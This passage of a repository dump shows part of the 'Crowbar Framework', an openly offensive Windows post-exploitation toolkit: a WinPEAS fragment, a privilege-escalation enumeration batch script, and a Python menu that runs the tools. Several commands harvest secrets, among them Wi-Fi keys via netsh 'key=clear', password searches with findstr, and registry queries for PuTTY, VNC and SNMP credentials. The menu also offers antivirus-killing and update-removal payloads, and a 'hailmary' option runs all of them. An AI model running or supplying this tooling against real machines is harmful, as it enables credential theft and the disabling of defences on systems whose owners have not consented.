:T_Progress
SET "Percentage=%~1"
SET /A "PercentageTrack=PercentageTrack+Percentage"
TITLE WinPEAS - Windows local Privilege Escalation Awesome Script - Scanning... !PercentageTrack!%%
EXIT /B

:ColorLine
SET "CurrentLine=%~1"
FOR /F "delims=" %%A IN ('FORFILES.EXE /P %~dp0 /M %~nx0 /C "CMD /C ECHO.!CurrentLine!"') DO ECHO.%%A
EXIT /B
--------------------------------------------------------------------------------
/escalate/winprivesc.bat:
--------------------------------------------------------------------------------
@echo off
title Windows Enumeration and Privilege Escalation Script
echo.
echo Loading System Information, wait a few seconds...
systeminfo > systeminfo.txt 2> nul
find "KB" systeminfo.txt > hotfix.txt 2> nul
cls
:MENU
echo " _ ___ ____ _ ______
echo "| | / (_)___ / __ \_____(_) __/ ____/_________
echo "| | /| / / / __ \/ /_/ / ___/ / | / / __/ / ___/ ___/
echo "| |/ |/ / / / / / ____/ / / /| |/ / /___(__ ) /__
echo "|__/|__/_/_/ /_/_/ /_/ /_/ |___/_____/____/\___/
echo.
echo Windows Enumeration and Privilege Escalation Script
echo www.joshruppe.com ^| Twitter: @josh_ruppe
echo.

echo 1 - All to Report
echo 2 - Operating System
echo 3 - Storage
echo 4 - Networking
echo 5 - Processes
echo 6 - User Info
echo 7 - Return to the Crowbar Framework
echo.
SET /P C=Select^>
echo.
IF %C%==1 GOTO ALL
IF %C%==2 GOTO OS
IF %C%==3 GOTO STORAGE
IF %C%==4 GOTO NETWORK
IF %C%==5 GOTO PROCESSES
IF %C%==6 GOTO USERS
IF %C%==7 GOTO EXIT

:ALL
echo WinPrivEsc >> report.txt
echo Windows Enumeration and Privilege Escalation Script>> report.txt
echo www.joshruppe.com ^| Twitter: @josh_ruppe>> report.txt
echo.>> report.txt
echo Report generated: >> report.txt
echo. >> report.txt
for /F "tokens=* USEBACKQ" %%F IN ('Date') do (
    set Date=%%F
    echo %Date% >> report.txt
)
echo __________________________ >> report.txt
echo. >> report.txt
echo OPERATING SYSTEM >> report.txt
echo __________________________>> report.txt
echo.>> report.txt
echo [++OS Name]>> report.txt
echo.>> report.txt
for /F "tokens=3-7" %%a IN ('find /i "OS Name:" systeminfo.txt') do set Name=%%a %%b %%c %%d %%e>> report.txt
echo %Name%>> report.txt
echo.>> report.txt
echo [++OS Version]>> report.txt
echo.>> report.txt
for /F "tokens=3-6" %%a IN ('findstr /B /C:"OS Version:" systeminfo.txt') do set Version=%%a %%b %%c %%d>> report.txt
echo %Version%>> report.txt
echo.>> report.txt
echo.>> report.txt
echo [++System Architecture]>> report.txt
echo.>> report.txt
for /F "tokens=3-4" %%a IN ('findstr /B /C:"System Type:" systeminfo.txt') do set Type=%%a %%b>> report.txt
echo %Type%>> report.txt
echo.>> report.txt
echo [++System Boot Time]>> report.txt
echo.>> report.txt
for /F "tokens=4-6" %%a IN ('findstr /B /C:"System Boot Time:" systeminfo.txt') do set UpTime=%%a %%b %%c>> report.txt
echo %UpTime%>> report.txt
echo.>> report.txt
echo [++Page File Location(s)]>> report.txt
echo.>> report.txt
for /F "tokens=4" %%a IN ('findstr /B /C:"Page File Location(s):" systeminfo.txt') do set Page=%%a>> report.txt
echo %Page%>> report.txt
echo.>> report.txt
echo [++Hotfix(s) Installed]>> report.txt
echo.>> report.txt
setlocal enabledelayedexpansion
for /F "tokens=2" %%a IN ('findstr /v ".TXT" hotfix.txt') do (
    set Hot=%%~a
    echo !Hot!>> report.txt
)
echo.>> report.txt
echo [++Hosts File]>> report.txt
echo.>> report.txt
more c:\WINDOWS\System32\drivers\etc\hosts>> report.txt
echo.>> report.txt
echo [++Networks File]>> report.txt
echo.>> report.txt
more c:\WINDOWS\System32\drivers\etc\networks>> report.txt
echo.>> report.txt
echo [++Running Services]>> report.txt
echo.>> report.txt
net start>> report.txt
echo.>> report.txt
echo.>> report.txt
echo _________________>> report.txt
echo.>> report.txt
echo STORAGE >> report.txt
echo _________________>> report.txt
echo.>> report.txt
echo [++Physical Drives]>> report.txt
net share>> report.txt
echo.>> report.txt
echo [++Network Drives]>> report.txt
echo.>> report.txt
net use>> report.txt
echo.>> report.txt
echo.>> report.txt
echo ____________________>> report.txt
echo.>> report.txt
echo NETWORKING >> report.txt
echo ____________________>> report.txt
echo.>> report.txt
echo [++IPCONFIG]>> report.txt
ipconfig /allcompartments /all>> report.txt
echo.>> report.txt
echo [++MAC Addresses]>> report.txt
getmac>> report.txt
echo.>> report.txt
echo [++Route]>> report.txt
echo.>> report.txt
route PRINT>> report.txt
echo.>> report.txt
echo [++Netstat]>> report.txt
netstat -ano>> report.txt
echo.>> report.txt
echo [++ARP]>> report.txt
arp -a>> report.txt
echo.>> report.txt
echo [++Firewall Configuration]>> report.txt
netsh firewall show config>> report.txt
echo [++Domain]>> report.txt
echo.>> report.txt
set userdomain>> report.txt
echo.>> report.txt
echo.>> report.txt
echo ___________________>> report.txt
echo.>> report.txt
echo PROCESSES >> report.txt
echo ___________________>> report.txt
echo.>> report.txt
echo [++Tasklist]>> report.txt
tasklist /v>> report.txt
echo.>> report.txt
echo [++Drivers Installed]>> report.txt
driverquery /v>> report.txt
echo.>> report.txt
echo.>> report.txt
echo ___________________>> report.txt
echo.>> report.txt
echo USER INFO >> report.txt
echo ___________________>> report.txt
echo.>> report.txt
echo [++Current User]>> report.txt
echo.>> report.txt
whoami>> report.txt
echo.>> report.txt
echo [++All Users]>> report.txt
net users>> report.txt
echo.>> report.txt
echo [++User Groups]>> report.txt
net localgroup>> report.txt
echo.>> report.txt
echo Done, check report.txt
echo.
del systeminfo.txt
del hotfix.txt
EXIT /B

:OS
echo __________________________
echo.
echo OPERATING SYSTEM
echo __________________________
echo.
echo [++OS Name]
echo.
for /F "tokens=3-7" %%a IN ('find /i "OS Name:" systeminfo.txt') do set Name=%%a %%b %%c %%d %%e
echo %Name%
echo.
echo [++OS Version]
echo.
for /F "tokens=3-6" %%a IN ('findstr /B /C:"OS Version:" systeminfo.txt') do set Version=%%a %%b %%c %%d
echo %Version%
echo.
echo [++System Architecture]
echo.
for /F "tokens=3-4" %%a IN ('findstr /B /C:"System Type:" systeminfo.txt') do set Type=%%a %%b
echo %Type%
echo.
echo [++System Boot Time]
echo.
for /F "tokens=4-6" %%a IN ('findstr /B /C:"System Boot Time:" systeminfo.txt') do set UpTime=%%a %%b %%c
echo %UpTime%
echo.
echo [++Page File Location(s)]
echo.
for /F "tokens=4" %%a IN ('findstr /B /C:"Page File Location(s):" systeminfo.txt') do set Page=%%a
echo %Page%
echo.
echo [++Hotfix(s) Installed]
echo.
setlocal enabledelayedexpansion
for /F "tokens=2" %%a IN ('findstr /v ".TXT" hotfix.txt') do (
    set Hot=%%~a
    echo !Hot!
)
echo.
echo [++Hosts File]
echo.
more c:\WINDOWS\System32\drivers\etc\hosts
echo.
echo [++Networks File]
echo.
more c:\WINDOWS\System32\drivers\etc\networks
echo.
echo [++Running Services]
echo.
net start
echo.
del systeminfo.txt
del hotfix.txt
EXIT /B

:STORAGE
echo _________________
echo.
echo STORAGE
echo _________________
echo.
echo [++Physical Drives]
net share
echo.
echo [++Network Drives]
echo.
net use
del systeminfo.txt
del hotfix.txt
EXIT /B

:NETWORK
echo ____________________
echo.
echo NETWORKING
echo ____________________
echo.
echo [++IPCONFIG]
ipconfig /allcompartments /all
echo.
echo [++MAC Addresses]
getmac
echo.
echo [++Route]
echo.
route PRINT
echo.
echo [++Netstat]
netstat -ano
echo.
echo [++ARP]
arp -a
echo.
echo [++Firewall Configuration]
netsh firewall show config
echo [++Domain]
echo.
set userdomain
echo.
del systeminfo.txt
del hotfix.txt
EXIT /B

:PROCESSES
echo ___________________
echo.
echo PROCESSES
echo ___________________
echo.
echo [++Tasklist]
tasklist /v
echo.
echo [++Drivers Installed]
driverquery /v
del systeminfo.txt
del hotfix.txt
EXIT /B

:USERS
echo ___________________
echo.
echo USER INFO
echo ___________________
echo.
echo [++Current User]
echo.
whoami
echo.
echo [++All Users]
net users
echo.
echo [++User Groups]
net localgroup
echo.
308 | del systeminfo.txt 309 | del hotfix.txt 310 | EXIT /B 311 | 312 | :EXIT 313 | del systeminfo.txt 314 | del hotfix.txt 315 | EXIT /B -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | # Crowbar Framework 2 | # 4/25/2021 3 | # Made by https://github.com/0x1CA3 4 | 5 | import os 6 | import ctypes 7 | import datetime 8 | import shutil 9 | import pyautogui 10 | import winreg 11 | import socket 12 | import platform 13 | import psutil 14 | import requests 15 | import subprocess 16 | from datetime import datetime 17 | from getmac import get_mac_address 18 | 19 | def functionclear(): 20 | if os.name == "nt": 21 | os.system("cls") 22 | else: 23 | os.system("clear") 24 | functionclear() 25 | 26 | ctypes.windll.kernel32.SetConsoleTitleW("[Crowbar Framework]") 27 | beginmen = socket.gethostname() 28 | 29 | ipurl = requests.get("https://ipv4bot.whatismyipaddress.com/").text 30 | iptrack = requests.get("https://vpnapi.io/api/").text 31 | 32 | # registry scanners from the old crowbar i made 33 | 34 | def reg(): 35 | access_reg = winreg.ConnectRegistry(None,winreg.HKEY_LOCAL_MACHINE) 36 | 37 | regkey = winreg.OpenKey(access_reg, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion") 38 | 39 | for n in range(20): 40 | try: 41 | x = winreg.EnumValue(regkey, n) 42 | print(x) 43 | except: 44 | break 45 | 46 | 47 | def reg1(): 48 | access_reg = winreg.ConnectRegistry(None,winreg.HKEY_CURRENT_USER) 49 | 50 | regkey = winreg.OpenKey(access_reg, r"Environment") 51 | 52 | for n in range(20): 53 | try: 54 | x = winreg.EnumValue(regkey, n) 55 | print(x) 56 | except: 57 | break 58 | 59 | def reg2(): 60 | access_reg = winreg.ConnectRegistry(None,winreg.HKEY_CURRENT_USER) 61 | 62 | regkey = winreg.OpenKey(access_reg, r"Volatile Environment") 63 | 64 | for n in range(20): 65 | try: 66 | x = winreg.EnumValue(regkey, n) 67 | print(x) 68 | except: 69 | break 70 | 71 | 72 | def 
reg3(): 73 | access_reg = winreg.ConnectRegistry(None,winreg.HKEY_LOCAL_MACHINE) 74 | 75 | regkey = winreg.OpenKey(access_reg, r"HARDWARE\DESCRIPTION\SYSTEM") 76 | 77 | for n in range(20): 78 | try: 79 | x = winreg.EnumValue(regkey, n) 80 | print(x) 81 | except: 82 | break 83 | 84 | 85 | def reg4(): 86 | access_reg = winreg.ConnectRegistry(None,winreg.HKEY_LOCAL_MACHINE) 87 | 88 | regkey = winreg.OpenKey(access_reg, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform") 89 | 90 | for n in range(20): 91 | try: 92 | x = winreg.EnumValue(regkey, n) 93 | print(x) 94 | except: 95 | break 96 | 97 | 98 | machine1 = platform.machine() 99 | version1 = platform.version() 100 | platform1 = platform.platform() 101 | uname1 = platform.uname() 102 | system1 = platform.system() 103 | process1 = platform.processor() 104 | computername = socket.gethostname() 105 | localipaddress = socket.gethostbyname(computername) 106 | boottime = datetime.fromtimestamp(psutil.boot_time()) 107 | 108 | 109 | def leavescripts(): 110 | scripts() 111 | 112 | # credit to https://github.com/d4vinci for some of the powershell scripts 113 | 114 | def scripts(): 115 | while True: 116 | scripts = input("\nScripts (scripts/)\n |==> ") 117 | if scripts == "help": 118 | print(''' 119 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 120 | | help - Prints out help commands. | 121 | | list - Lists all the scripts. | 122 | | use (script number) - Selects and loads specified utility. Example: use 1 | 123 | | hailmary - Runs all scripts against the target. [Not Recommended] | 124 | | clear - Clears the screen. | 125 | | back - Goes back to the Crowbar menu. 
| 126 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 127 | ''') 128 | elif scripts == "list": 129 | print(''' 130 | +———— Scripts ——————————————————————————————————————————————————————————————————— Description ————————————————————————————————————————————————————+ 131 | | 1. scripts/net/grabwifi A script that dumps the Wi-Fi SSID. | 132 | | 2. scripts/sysdump A script that dumps basic system information. | 133 | | 3. scripts/regdump A script that dumps information from the registry. | 134 | | 4. scripts/AVKILL Script that attempts to kill the targets AntiVirus. | 135 | | 5. scripts/net/dumpwifipass Script that dumps Wi-Fi passwords. | 136 | | 6. scripts/vuln/eternal_blue [Nmap must be installed on target computer] Checks if target machine is vulnerable to "Eternal Blue". | 137 | | 7. scripts/vuln/netapi [Nmap must be installed on target computer] Checks if target machine is vulnerable to "MS08-067". [Netapi] | 138 | | 8. scripts/getusers Gets all users registered on the target machine. | 139 | | 9. scripts/cmd/read_firewall_config Gathers firewall information. | 140 | | 10. scripts/cmd/read_registry_putty_sessions Gather information and passwords from putty sessions. | 141 | | 11. scripts/cmd/search_for_passwords Searches for passwords on the target machine. | 142 | | 12. scripts/cmd/search_registry_for_passwords_cu Searches registry for passwords. | 143 | | 13. scripts/cmd/read_registry_vnc_passwords Searches the registry for VNC passwords. | 144 | | 14. scripts/cmd/read_registry_snmp_key Query machine snmp key in the registry to get snmp parameters. | 145 | | 15. scripts/cmd/read_registry_run_key Query the run key for the current user on the target machine. | 146 | | 16. scripts/cmd/list_network_shares Lists all network shares. | 147 | | 17. scripts/cmd/list_localgroups Lists the local groups. | 148 | | 18. scripts/cmd/list_drives List all drives. | 149 | | 19. 
scripts/cmd/get_snmp_config Fetches current SNMP Configuration. | 150 | | 20. scripts/cmd/list_user_privileges Lists current user privileges. | 151 | | 21. scripts/cmd/read_services Reads services with wmic. | 152 | | 22. scripts/cmd/list_installed_updates Lists installed updates. | 153 | | 23. scripts/powershell/list_unqouted_services Querying wmi to search for unquoted service paths. | 154 | | 24. scripts/powershell/list_routing_tables Lists current routing table. | 155 | | 25. scripts/powershell/list_network_interfaces Lists network interface. | 156 | | 26. scripts/powershell/list_installed_programs_using_registry Lists installed programs using the registry. | 157 | | 27. scripts/powershell/list_installed_programs_using_folders Lists installed programs using folders. | 158 | | 28. scripts/powershell/list_arp_tables Lists ARP tables. | 159 | | 29. scripts/powershell/get_iis_config Fetches IIS config. | 160 | | 30. scripts/powershell/sensitive_data_search A script that searches for files with sensitive data. | 161 | | 31. scripts/powershell/list_credentials A script that lists credentials. | 162 | | 32. scripts/powershell/remove_update [Nishang] A payload that removes updates for the target machine. | 163 | | 33. scripts/powershell/get_unconstrained [Nishang] Script that finds machines with Unconstrained Delegation. | 164 | | 34. scripts/extra/cmd/get_architecture Gets the processor architecture. | 165 | | 35. scripts/extra/cmd/list_antivirus Lists installed AV's on the target machine. 
| 166 | +—————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 167 | ''') 168 | elif scripts == "clear": 169 | functionclear() 170 | elif scripts == "hailmary": 171 | os.system("Netsh WLAN show profiles") 172 | print(f''' 173 | +——— Basic System Information ———————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 174 | | Machine: {machine1} | 175 | | Version: {version1} | 176 | | Platform: {platform1} | 177 | | System: {system1} | 178 | | Computer Name: {computername} | 179 | | Local IP: {localipaddress} | 180 | | Last Boot Time: {boottime} | 181 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 182 | ''') 183 | print(''' 184 | Information from SOFTWARE\Microsoft\Windows NT\CurrentVersion 185 | ———————————————————————————————————————————————————————————————''') 186 | reg() 187 | print(''' 188 | Information from \Environment 189 | ———————————————————————————————————————————————————————————————''') 190 | reg1() 191 | print(''' 192 | Information from HKEY_CURRENT_USER\Volatile Environment 193 | ———————————————————————————————————————————————————————————————''') 194 | reg2() 195 | print(''' 196 | Information from HARDWARE\DESCRIPTION\SYSTEM 197 | ———————————————————————————————————————————————————————————————''') 198 | reg3() 199 | print(''' 200 | Information from SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform 201 | ———————————————————————————————————————————————————————————————''') 202 | reg4() 203 | os.system("nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 {}".format(localipaddress)) 204 | os.system("nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 {}".format(localipaddress)) 205 | os.system("NET users") 206 | os.system("netsh firewall show state & netsh firewall 
show config") 207 | os.system("reg query 'HKCU\Software\SimonTatham\PuTTY\Sessions'") 208 | os.system("findstr /si password *.xml *.ini *.txt *.config") 209 | os.system('''REG QUERY HKCU /F "password" /t REG_SZ /S /K''') 210 | os.system('''reg query "HKCU\Software\ORL\WinVNC3\Password"''') 211 | os.system('''reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"''') 212 | os.system("reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run") 213 | os.system("net share") 214 | os.system("net localgroup") 215 | os.system("wmic logicaldisk get caption,description,providername") 216 | os.system("reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s") 217 | os.system("whoami /priv") 218 | os.system("wmic service list brief") 219 | os.system("wmic qfe") 220 | subprocess.call('''powershell.exe Get-Content scripts/unquoteservice.ps1 | PowerShell.exe -noprofile -''', shell=True) 221 | subprocess.call('''powershell.exe Get-Content scripts/routingtable.ps1 | PowerShell.exe -noprofile -''', shell=True) 222 | subprocess.call('''powershell.exe Get-Content scripts/listnetworkinter.ps1 | PowerShell.exe -noprofile -''', shell=True) 223 | subprocess.call('''powershell.exe Get-Content scripts/listprogramsreg.ps1 | PowerShell.exe -noprofile -''', shell=True) 224 | subprocess.call('''powershell.exe Get-Content scripts/listprogramsfol.ps1 | PowerShell.exe -noprofile -''', shell=True) 225 | subprocess.call('''powershell.exe Get-Content scripts/listarptables.ps1 | PowerShell.exe -noprofile -''', shell=True) 226 | subprocess.call('''powershell.exe Get-Content scripts/iisconfig.ps1 | PowerShell.exe -noprofile -''', shell=True) 227 | subprocess.call('''powershell.exe Get-Content scripts/sensitive_data_search.ps1 | PowerShell.exe -noprofile -''', shell=True) 228 | subprocess.call('''powershell.exe Get-Content scripts/listcredentials.ps1 | PowerShell.exe -noprofile -''', shell=True) 229 | subprocess.call('''powershell.exe Get-Content scripts/removeupdate.ps1 | PowerShell.exe -noprofile 
-''', shell=True) 230 | subprocess.call('''(cd scripts) && (PowerShell.exe -ExecutionPolicy Bypass -File ./getunconstrained.ps1)''', shell=True) 231 | os.system("wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%") 232 | os.system("cd scripts && list_antivirus.bat") 233 | print(''' 234 | +——— Message ————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 235 | | Hail mary finished! | 236 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 237 | ''') 238 | elif scripts == "back": 239 | crowbarbanner() 240 | mainmenuinput() 241 | elif scripts == "use 1": 242 | while True: 243 | scriptsgrabwifi = input("\nScripts (scripts/net/grabwifi)\n |==> ") 244 | if scriptsgrabwifi == "help": 245 | print(''' 246 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 247 | | help - Prints out help commands. | 248 | | dump - Dumps all Wi-Fi SSID's. | 249 | | clear - Clears the screen. | 250 | | back - goes back to the 'Scripts' directory. | 251 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 252 | ''') 253 | elif scriptsgrabwifi == "dump": 254 | os.system("Netsh WLAN show profiles") 255 | elif scriptsgrabwifi == "clear": 256 | functionclear() 257 | elif scriptsgrabwifi == "back": 258 | leavescripts() 259 | else: 260 | print("Wrong Command!") 261 | elif scripts == "use 2": 262 | while True: 263 | scriptssysdump = input("\nScripts (scripts/sysdump)\n |==> ") 264 | if scriptssysdump == "help": 265 | print(''' 266 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 267 | | help - Prints out help commands. 
| 268 | | dump - Dumps basic system information. | 269 | | clear - Clears the screen. | 270 | | back - goes back to the 'Scripts' directory. | 271 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 272 | ''') 273 | elif scriptssysdump == "dump": 274 | print(f''' 275 | +——— Basic System Information ———————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 276 | | Machine: {machine1} | 277 | | Version: {version1} | 278 | | Platform: {platform1} | 279 | | System: {system1} | 280 | | Computer Name: {computername} | 281 | | Local IP: {localipaddress} | 282 | | Last Boot Time: {boottime} | 283 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 284 | ''') 285 | elif scriptssysdump == "clear": 286 | functionclear() 287 | elif scriptssysdump == "back": 288 | leavescripts() 289 | else: 290 | print("Wrong Command!") 291 | elif scripts == "use 3": 292 | while True: 293 | scriptsregdump = input("\nScripts (scripts/regdump)\n |==> ") 294 | if scriptsregdump == "help": 295 | print(''' 296 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 297 | | help - Prints out help commands. | 298 | | dump - Dumps information from the registry. | 299 | | clear - Clears the screen. | 300 | | back - goes back to the 'Scripts' directory. 
| 301 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 302 | ''') 303 | elif scriptsregdump == "dump": 304 | print(''' 305 | Information from SOFTWARE\Microsoft\Windows NT\CurrentVersion 306 | ———————————————————————————————————————————————————————————————''') 307 | reg() 308 | print(''' 309 | Information from \Environment 310 | ———————————————————————————————————————————————————————————————''') 311 | reg1() 312 | print(''' 313 | Information from HKEY_CURRENT_USER\Volatile Environment 314 | ———————————————————————————————————————————————————————————————''') 315 | reg2() 316 | print(''' 317 | Information from HARDWARE\DESCRIPTION\SYSTEM 318 | ———————————————————————————————————————————————————————————————''') 319 | reg3() 320 | print(''' 321 | Information from SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform 322 | ———————————————————————————————————————————————————————————————''') 323 | reg4() 324 | elif scriptsregdump == "clear": 325 | functionclear() 326 | elif scriptsregdump == "back": 327 | leavescripts() 328 | else: 329 | print("Wrong Command!") 330 | elif scripts == "use 4": 331 | print(''' 332 | +——— Message ————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 333 | | For the safety of the machine, this script will not be executed. | 334 | | However, you can access the file in the '/scripts' folder. 
| 335 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 336 | ''') 337 | elif scripts == "use 5": 338 | while True: 339 | scriptswifipass = input("\nScripts (scripts/net/dumpwifipass)\n |==> ") 340 | if scriptswifipass == "help": 341 | print(''' 342 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 343 | | help - Prints out help commands. | 344 | | dump - Dumps Wi-Fi password. | 345 | | clear - Clears the screen. | 346 | | back - goes back to the 'Scripts' directory. | 347 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 348 | ''') 349 | elif scriptswifipass == "dump": 350 | wifissid = input("\nScripts (Enter the network SSID which you want to dump passwords from)\n |==> ") 351 | os.system("NETSH WLAN SHOW PROFILE {} KEY=CLEAR".format(wifissid)) 352 | elif scriptswifipass == "clear": 353 | functionclear() 354 | elif scriptswifipass == "back": 355 | leavescripts() 356 | elif scripts == "use 6": 357 | while True: 358 | scriptseternal = input("\nScripts (scripts/vuln/eternal_blue)\n |==> ") 359 | if scriptseternal == "help": 360 | print(''' 361 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 362 | | help - Prints out help commands. | 363 | | vuln - Checks if the target computer is vulnerable. | 364 | | clear - Clears the screen. | 365 | | back - goes back to the 'Scripts' directory. 
| 366 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 367 | ''') 368 | elif scriptseternal == "vuln": 369 | os.system("nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 {}".format(localipaddress)) 370 | elif scriptseternal == "clear": 371 | functionclear() 372 | elif scriptseternal == "back": 373 | leavescripts() 374 | else: 375 | print("Wrong Command!") 376 | elif scripts == "use 7": 377 | while True: 378 | scriptsnetapi = input("\nScripts (scripts/vuln/netapi)\n |==> ") 379 | if scriptsnetapi == "help": 380 | print(''' 381 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 382 | | help - Prints out help commands. | 383 | | vuln - Checks if the target computer is vulnerable. | 384 | | clear - Clears the screen. | 385 | | back - goes back to the 'Scripts' directory. | 386 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 387 | ''') 388 | elif scriptsnetapi == "vuln": 389 | os.system("nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 {}".format(localipaddress)) 390 | elif scriptsnetapi == "clear": 391 | functionclear() 392 | elif scriptsnetapi == "back": 393 | leavescripts() 394 | else: 395 | print("Wrong Command!") 396 | elif scripts == "use 8": 397 | while True: 398 | scriptsgetuser = input("\nScripts (scripts/cmd/getusers)\n |==> ") 399 | if scriptsgetuser == "help": 400 | print(''' 401 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 402 | | help - Prints out help commands. | 403 | | run - Runs the script against the host machine. | 404 | | clear - Clears the screen. | 405 | | back - goes back to the 'Scripts' directory. 
| 406 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 407 | ''') 408 | elif scriptsgetuser == "run": 409 | os.system("NET users") 410 | elif scriptsgetuser == "clear": 411 | functionclear() 412 | elif scriptsgetuser == "back": 413 | leavescripts() 414 | else: 415 | print("Wrong Command!") 416 | elif scripts == "use 9": 417 | while True: 418 | scriptsfirewallcfg = input("\nScripts (scripts/cmd/read_firewall_config)\n |==> ") 419 | if scriptsfirewallcfg == "help": 420 | print(''' 421 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 422 | | help - Prints out help commands. | 423 | | run - Runs the script against the host machine. | 424 | | clear - Clears the screen. | 425 | | back - goes back to the 'Scripts' directory. | 426 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 427 | ''') 428 | elif scriptsfirewallcfg == "run": 429 | os.system("netsh firewall show state & netsh firewall show config") 430 | elif scriptsfirewallcfg == "clear": 431 | functionclear() 432 | elif scriptsfirewallcfg == "back": 433 | leavescripts() 434 | else: 435 | print("Wrong Command!") 436 | elif scripts == "use 10": 437 | while True: 438 | scriptsreadregputty = input("\nScripts (scripts/cmd/read_registry_putty_sessions)\n |==> ") 439 | if scriptsreadregputty == "help": 440 | print(''' 441 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 442 | | help - Prints out help commands. | 443 | | run - Runs the script against the host machine. | 444 | | clear - Clears the screen. | 445 | | back - goes back to the 'Scripts' directory. 
| 446 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 447 | ''') 448 | elif scriptsreadregputty == "run": 449 | os.system("reg query 'HKCU\Software\SimonTatham\PuTTY\Sessions'") 450 | elif scriptsreadregputty == "clear": 451 | functionclear() 452 | elif scriptsreadregputty == "back": 453 | leavescripts() 454 | else: 455 | print("Wrong Command!") 456 | elif scripts == "use 11": 457 | while True: 458 | scriptssearchpass = input("\nScripts (scripts/cmd/search_for_passwords)\n |==> ") 459 | if scriptssearchpass == "help": 460 | print(''' 461 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 462 | | help - Prints out help commands. | 463 | | run - Runs the script against the host machine. | 464 | | clear - Clears the screen. | 465 | | back - goes back to the 'Scripts' directory. | 466 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 467 | ''') 468 | elif scriptssearchpass == "run": 469 | os.system("findstr /si password *.xml *.ini *.txt *.config") 470 | elif scriptssearchpass == "clear": 471 | functionclear() 472 | elif scriptssearchpass == "back": 473 | leavescripts() 474 | else: 475 | print("Wrong Command!") 476 | elif scripts == "use 12": 477 | while True: 478 | scriptsregisterypasswordcu = input("\nScripts (scripts/cmd/search_registry_for_passwords_cu)\n |==> ") 479 | if scriptsregisterypasswordcu == "help": 480 | print(''' 481 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 482 | | help - Prints out help commands. | 483 | | run - Runs the script against the host machine. | 484 | | clear - Clears the screen. | 485 | | back - goes back to the 'Scripts' directory. 
| 486 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 487 | ''') 488 | elif scriptsregisterypasswordcu == "run": 489 | os.system('''REG QUERY HKCU /F "password" /t REG_SZ /S /K''') 490 | elif scriptsregisterypasswordcu == "clear": 491 | functionclear() 492 | elif scriptsregisterypasswordcu == "back": 493 | leavescripts() 494 | else: 495 | print("Wrong Command!") 496 | elif scripts == "use 13": 497 | while True: 498 | scriptsreadvncpass = input("\nScripts (scripts/cmd/read_registry_vnc_passwords)\n |==> ") 499 | if scriptsreadvncpass == "help": 500 | print(''' 501 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 502 | | help - Prints out help commands. | 503 | | run - Runs the script against the host machine. | 504 | | clear - Clears the screen. | 505 | | back - goes back to the 'Scripts' directory. | 506 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 507 | ''') 508 | elif scriptsreadvncpass == "run": 509 | os.system('''reg query "HKCU\Software\ORL\WinVNC3\Password"''') 510 | elif scriptsreadvncpass == "clear": 511 | functionclear() 512 | elif scriptsreadvncpass == "back": 513 | leavescripts() 514 | else: 515 | print("Wrong Command!") 516 | elif scripts == "use 14": 517 | while True: 518 | scriptssnmpkey = input("\nScripts (scripts/cmd/read_registry_snmp_key)\n |==> ") 519 | if scriptssnmpkey == "help": 520 | print(''' 521 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 522 | | help - Prints out help commands. | 523 | | run - Runs the script against the host machine. | 524 | | clear - Clears the screen. | 525 | | back - goes back to the 'Scripts' directory. 
